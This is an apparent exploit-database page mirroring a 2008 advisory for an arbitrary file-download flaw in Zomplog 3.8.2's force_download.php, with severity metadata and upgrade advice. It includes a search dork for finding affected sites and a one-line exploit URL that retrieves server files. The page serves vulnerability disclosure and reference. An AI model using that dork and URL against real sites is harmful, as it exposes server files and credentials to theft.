header-logo
Suggest Exploit
vendor:
Zomplog
by:
Stack-Terrorist
7.5
CVSS
HIGH
File Disclosure
434
CWE
Product Name: Zomplog
Affected Version From: 3.8.2002
Affected Version To: All
Patch Exists: Yes
Related CWE: N/A
CPE: a:zomp:zomplog
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Zomplog 3.8.2 <= file disclouse

The vulnerability exists due to insufficient validation of user-supplied input in 'force_download.php' script. A remote attacker can download arbitrary files from the vulnerable server.

Mitigation:

Upgrade to the latest version of Zomplog 3.8.2 or later.
Source

Exploit-DB raw data:

Name:  "Zomplog 3.8.2 <= file disclouse"
Version: All
Script Download: http://www.zomp.nl/zomplog/
DORK: "powered by zomplog"
Discovered By: Stack-Terrorist

Exploit:
http://localhost/path/upload/force_download.php?file=force_download.php
 
thnx : alah 

# milw0rm.com [2008-05-16]

Navigation

Suggest Exploit

Services By CQR